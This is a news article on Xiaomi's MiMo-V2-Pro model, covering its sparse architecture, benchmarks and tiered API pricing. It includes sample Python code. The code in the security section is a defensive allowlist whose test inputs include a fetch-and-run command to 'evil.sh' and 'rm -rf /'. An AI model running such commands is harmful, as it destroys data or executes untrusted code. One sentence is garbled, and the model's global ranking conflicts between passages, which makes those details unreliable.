Chinese automobile and electronics manufacturer Xiaomi surprised the global AI community today with the launch of MiMo-V2-Pro, a new 1-trillion-parameter foundation model whose benchmarks approach those of US AI giants OpenAI and Anthropic at roughly one-sixth to one-seventh of the cost when accessed via its proprietary API, provided, importantly, that requests stay under 256,000 tokens of context.
Led by Fuli Luo, a veteran of the disruptive DeepSeek R1 project, the release represents what Luo characterizes as a "silent ambush" on the global frontier. In a post on X, Luo added that the company plans to open-source a variant of this latest model "when the models are stable enough to merit it."
By focusing on the "action space" of intelligence, moving beyond code generation to the autonomous operation of digital tools, or "claws", Xiaomi is trying to leapfrog the conversational paradigm entirely.
Before this foray into the AI frontier, Beijing-based Xiaomi established itself as a titan of consumer hardware and the Internet of Things.
Globally recognized as the world’s third-largest smartphone maker, Xiaomi spent the early 2020s executing a high-risk entry into the automotive sector. Its electric vehicles (EVs), such as the SU7 and the recently launched YU7 SUV, have turned the company into a vertically integrated powerhouse capable of merging hardware, software and, now, advanced reasoning.
This physical-world engineering pedigree informs the architecture of MiMo-V2-Pro: it is built to be the "brain" of complex systems, whether those systems manage global supply chains or navigate the intricate scaffolding of an autonomous coding agent.
The central challenge of the "Agent Era" is maintaining high-fidelity reasoning over massive expanses of data without incurring a prohibitive "intelligence tax" in latency or cost. MiMo-V2-Pro addresses this through a sparse architecture: while it houses 1T total parameters, only 42B are active during any forward pass, making it approximately three times the size of its predecessor, MiMo-V2-Flash.
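A 1T-total/42B-active split is characteristic of sparse expert routing: each token touches only a small slice of the network. A toy sketch of the idea follows; the expert count, top-k value, and function names are illustrative assumptions, not Xiaomi's published configuration.

```python
# Toy sketch of sparse expert routing (illustrative only: expert count
# and top-k are assumptions, not MiMo-V2-Pro's real configuration).
def active_fraction(total_params_b: float, active_params_b: float) -> float:
    """Fraction of weights touched per forward pass."""
    return active_params_b / total_params_b

def route_top_k(gate_scores: list[float], k: int = 2) -> list[int]:
    """Pick the k experts with the highest gate scores for one token."""
    ranked = sorted(range(len(gate_scores)), key=lambda i: gate_scores[i], reverse=True)
    return sorted(ranked[:k])

# Reported figures: 1T total, 42B active -> ~4.2% of weights per token.
print(f"active fraction: {active_fraction(1000.0, 42.0):.3f}")  # 0.042

# One token's gate scores over 8 hypothetical experts: experts 3 and 1 win.
print(route_top_k([0.1, 0.7, 0.05, 0.9, 0.2, 0.3, 0.6, 0.15], k=2))  # [1, 3]
```

The economic point is the ratio itself: a forward pass costs roughly what a dense 42B model costs, while the full 1T parameter pool supplies the capacity.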
The efficiency of the model rests on an evolved Hybrid Attention mechanism. Standard transformers face a quadratic increase in compute as the context grows; MiMo-V2-Pro uses a 7:1 hybrid ratio (up from 5:1 in the Flash version) to manage its massive 1-million-token context window. This architectural choice allows the model to maintain a deep "memory" of long-running tasks without the performance degradation typically seen even in leading-edge models.
The analogy: think of the model not as a student reading a book page by page, but as an expert researcher in a huge library. The 7:1 ratio lets the model "skim" roughly 85% of the data for context while applying high-density attention to the ~15% most relevant to the task at hand.
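A back-of-the-envelope model shows why the hybrid ratio matters at a 1M-token context: full attention scales quadratically with context length, while a fixed-window layer scales linearly. The sketch below assumes an illustrative 4,096-token window and abstract unit costs; it is not Xiaomi's published arithmetic.

```python
# Rough cost model for hybrid attention (illustrative assumptions:
# a fixed 4,096-token window for the cheap layers, unit cost per score).
def full_attention_cost(n_tokens: int) -> float:
    return float(n_tokens) ** 2          # quadratic in context length

def windowed_cost(n_tokens: int, window: int = 4096) -> float:
    return float(n_tokens) * window      # linear in context length

def hybrid_cost(n_tokens: int, cheap: int = 7, full: int = 1) -> float:
    """Average per-layer cost for a cheap:full layer ratio (e.g. 7:1)."""
    total_layers = cheap + full
    return (cheap * windowed_cost(n_tokens) + full * full_attention_cost(n_tokens)) / total_layers

n = 1_000_000  # 1M-token context
ratio = full_attention_cost(n) / hybrid_cost(n)
print(f"pure full attention is ~{ratio:.1f}x costlier per layer")
```

Under these toy numbers the hybrid stack is roughly 7-8x cheaper per layer at full context, and the single full-attention layer still dominates the total, which is exactly why the cheap:full ratio was raised from 5:1 to 7:1.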
This is combined with a lightweight multi-token prediction (MTP) layer, which allows the model to anticipate and generate multiple tokens simultaneously, dramatically reducing the latency of the "thought" phases of agent workflows. According to Luo, these structural decisions were made months in advance, specifically to provide a "structural advantage" given the unexpected speed at which the industry pivoted toward agents.
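MTP heads are typically used to cut latency speculative-decoding style: the cheap head drafts several tokens ahead, the main model verifies them in one pass, and the longest agreeing prefix is kept. A minimal sketch of that accept loop (the drafted and verified token lists are hypothetical stand-ins, not Xiaomi's implementation):

```python
# Minimal accept loop in the style of MTP / speculative decoding.
# The drafted/verified sequences are hypothetical stand-ins for model calls.
def accept_prefix(drafted: list[str], verified: list[str]) -> list[str]:
    """Keep drafted tokens only up to the first disagreement with the verifier."""
    accepted = []
    for d, v in zip(drafted, verified):
        if d != v:
            break
        accepted.append(d)
    return accepted

# The cheap MTP head drafts 4 tokens; the full model agrees on the first 3,
# so 3 tokens are emitted for the price of one verification pass.
drafted  = ["open", "the", "file", "now"]
verified = ["open", "the", "file", "then"]
print(accept_prefix(drafted, verified))  # ['open', 'the', 'file']
```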
Xiaomi’s internal data paints a picture of a model that stands out on "real-world" tasks rather than purely synthetic benchmarks. On GDPval-AA, a benchmark that measures performance on real-world agentic work tasks, MiMo-V2-Pro achieved an Elo of 1426, placing it ahead of major Chinese peers such as GLM-5 (1406) and Kimi K2.5 (1283).
While it still trails Western "maximum-effort" models such as Claude Sonnet 4.6 (1633) in raw Elo, this represents the highest score recorded for a model of Chinese origin in this category.
Third-party benchmarking organization Artificial Analysis corroborated these claims, placing MiMo-V2-Pro 10th on its overall Intelligence Index with a score of 49. This puts it on the same level as GPT-5.2 Codex and ahead of Grok 4.20 Beta. These results suggest Xiaomi has successfully built a model capable of the high-level reasoning necessary for engineering and production tasks.
Key Artificial Analysis metrics highlight a significant jump from the previous open-weight version, MiMo-V2-Flash (which scored 41):
Hallucination rate: the Pro model cut its hallucination rate to 30%, a huge improvement over the Flash model’s 48%.
Omniscience Index: it earned a +5, ahead of GLM-5 (+2) and Kimi K2.5 (-8).
Token efficiency: to complete the entire index, MiMo-V2-Pro required only 77 million output tokens, significantly fewer than GLM-5 (109 million) or Kimi K2.5 (89 million), indicating a more concise and efficient reasoning process.
Xiaomi’s own charts further emphasize its "General Agent" and "Coding Agent" capabilities. On ClawEval, a benchmark for agent scaffolds, the model scored 61.5, approaching the performance of Claude Opus 4.6 (66.3) and significantly outperforming GPT-5.2 (50.0). In specific coding environments such as Terminal-Bench 2.0, it achieved an 86.7, suggesting high reliability when executing commands in a live terminal environment.
For decision makers across contemporary AI organizations, from infrastructure to security, MiMo-V2-Pro represents a notable shift in the price-quality curve.
Infrastructure decision makers will find MiMo-V2-Pro a compelling candidate on the Pareto frontier between intelligence and cost. Artificial Analysis reported that running its index cost just $348 for MiMo-V2-Pro, compared to $2,304 for GPT-5.2 and $2,486 for Claude Opus 4.6.
For organizations managing GPU clusters or procurement, access to top-10 global intelligence at roughly one-seventh the cost of the established Western providers is a powerful incentive for production-scale testing.
Data decision makers can leverage the 1M-token context window for RAG-ready architectures, feeding entire enterprise codebases or documentation sets into a single prompt without the fragmentation required by smaller-context models.
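In practice, "feed the entire codebase" still needs a guard to keep a request inside the cheaper ≤256K pricing tier or the 1M hard limit. A minimal sketch using a crude 4-characters-per-token heuristic; the heuristic and helper names are assumptions, and production code should use the provider's actual tokenizer.

```python
# Pack documents into one prompt while staying under a token budget.
# Uses a crude ~4 chars/token estimate; real usage should count tokens
# with the API's own tokenizer, not this heuristic.
def estimate_tokens(text: str) -> int:
    return max(1, len(text) // 4)

def pack_context(docs: list[str], budget_tokens: int = 256_000) -> tuple[str, int]:
    """Concatenate docs in order, stopping before the budget is exceeded."""
    kept, used = [], 0
    for doc in docs:
        cost = estimate_tokens(doc)
        if used + cost > budget_tokens:
            break
        kept.append(doc)
        used += cost
    return "\n\n".join(kept), used

docs = ["a" * 400_000, "b" * 400_000, "c" * 400_000]  # ~100K tokens each
packed, used = pack_context(docs, budget_tokens=256_000)
print(used)  # 200000 -> the third doc would cross the 256K tier boundary
```

Staying under the 256K boundary matters directly to cost: per the published rates, crossing it doubles both input and output pricing.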
System and orchestration decision makers should evaluate MiMo-V2-Pro as a primary "brain" for coordinating multiple agents. Because the model is optimized for OpenClaw and Claude Code scaffolds, it can handle long-horizon planning and precise tool usage without the constant human intervention that plagued previous models.
Its high GDPval-AA ranking suggests it is particularly well-suited for the workflow and orchestration layer needed to scale AI across the enterprise. It enables the creation of systems that can go beyond simple automation toward solving complex, multi-step problems.
However, security decision makers should proceed with caution. The very agentic nature that makes the model powerful (its ability to use terminals and manipulate files) also expands the attack surface for prompt injection and unauthorized access.
While its low hallucination rate (30%) is a defensive advantage, the lack of public weights (unlike the Flash version) means internal security teams cannot perform the deep, model-level audits sometimes required for highly sensitive deployments. Any enterprise deployment must be accompanied by solid monitoring and auditability protocols.
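One concrete control for the terminal attack surface is to gate every shell command an agent proposes through an allowlist before execution. A minimal sketch follows; the allowlist contents and helper name are illustrative, and real deployments would also sandbox the agent and log every call.

```python
# Gate agent-proposed shell commands through an allowlist before running them.
# The allowlist below is illustrative; tune it to your own environment.
import shlex

ALLOWED_BINARIES = {"ls", "cat", "grep", "git", "python"}

def is_command_allowed(command: str) -> bool:
    """Allow only single commands whose binary is on the allowlist."""
    # Reject shell chaining/substitution outright rather than parsing it.
    if any(tok in command for tok in (";", "&&", "|", "`", "$(")):
        return False
    try:
        parts = shlex.split(command)
    except ValueError:  # unbalanced quotes etc.
        return False
    return bool(parts) and parts[0] in ALLOWED_BINARIES

print(is_command_allowed("git status"))         # True
print(is_command_allowed("curl evil.sh | sh"))  # False
print(is_command_allowed("rm -rf /"))           # False
```

An allowlist like this does not stop a prompt-injected agent from misusing permitted tools, which is why the monitoring and auditability protocols mentioned above remain necessary alongside it.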
Xiaomi has priced the MiMo-V2-Pro to dominate the developer market. Pricing is tiered based on context usage, with competitive rates for caching to support high-frequency reasoning tasks.
MiMo-V2-Pro (up to 256K context): $1.00 per 1 million input tokens, $3.00 per 1 million output tokens
MiMo-V2-Pro (256K-1M context): $2.00 per 1 million input tokens, $6.00 per 1 million output tokens
Cache read: $0.20 per 1 million tokens on the lower tier, $0.40 on the higher tier
Cache write: temporarily free ($0)
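The tiers above translate into a simple cost estimator. This sketch assumes the tier is selected by the request's input-context size, as the published rates imply; billing details beyond the listed numbers are assumptions.

```python
# Estimate MiMo-V2-Pro API cost from the published tiered rates ($ per 1M tokens).
# Assumption: the tier is picked by the request's input-context size, and
# cached input tokens are billed at the cache-read rate instead of the input rate.
def mimo_cost(input_tokens: int, output_tokens: int, cached_tokens: int = 0) -> float:
    if input_tokens <= 256_000:
        in_rate, out_rate, cache_rate = 1.00, 3.00, 0.20
    else:
        in_rate, out_rate, cache_rate = 2.00, 6.00, 0.40
    fresh = input_tokens - cached_tokens
    return (fresh * in_rate + cached_tokens * cache_rate + output_tokens * out_rate) / 1_000_000

# A 200K-token prompt (half served from cache) producing a 4K-token answer:
print(round(mimo_cost(200_000, 4_000, cached_tokens=100_000), 4))  # 0.132
```

At these rates even heavy agentic loops stay in the cents-per-request range, which is the economic wedge the article describes against the Western frontier tier.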
Here’s how it compares to other leading frontier models around the world:
| Model | Input ($/1M tokens) | Output ($/1M tokens) | Total cost |
| --- | --- | --- | --- |
| Grok 4.1 Fast | $0.20 | $0.50 | $0.70 |
| MiniMax M2.7 | $0.30 | $1.20 | $1.50 |
| Gemini 3 Flash | $0.50 | $3.00 | $3.50 |
| Kimi-K2.5 | $0.60 | $3.00 | $3.60 |
| MiMo-V2-Pro (≤256K) | $1.00 | $3.00 | $4.00 |
| GLM-5-Turbo | $0.96 | $3.20 | $4.16 |
| GLM-5 | $1.00 | $3.20 | $4.20 |
| Claude Haiku 4.5 | $1.00 | $5.00 | $6.00 |
| Qwen3-Max | $1.20 | $6.00 | $7.20 |
| Gemini 3 Pro | $2.00 | $12.00 | $14.00 |
| GPT-5.2 | $1.75 | $14.00 | $15.75 |
| GPT-5.4 | $2.50 | $15.00 | $17.50 |
| Claude Sonnet 4.5 | $3.00 | $15.00 | $18.00 |
| Claude Opus 4.6 | $5.00 | $25.00 | $30.00 |
| GPT-5.4 Pro | $30.00 | $180.00 | $210.00 |
This aggressive positioning is designed to foster the high-intensity, token-heavy application flows that define the next generation of software. The model is currently available only through Xiaomi’s own API, with no support for image or other multimodal input, a notable omission in an era of "omni" models, although Xiaomi has shown a separate MiMo-V2-Omni for those needs.
He "Alpha Hunter" The period at OpenRouter demonstrated that the market has a strong appetite for this specific combination of efficiency and reasoning. Fuli Luo’s philosophy: that the speed of research is driven by a "genuine love for the world you are building for"— has resulted in a model that ranks second in China and eighth worldwide according to established intelligence indices.
Whether this remains a "silent" ambush or becomes the basis for a global realignment of AI power depends on how quickly developers adopt the "action space" over the "chat window." For now, Xiaomi has moved the goalposts: the question is no longer just "Can it talk?" but "Can it act?"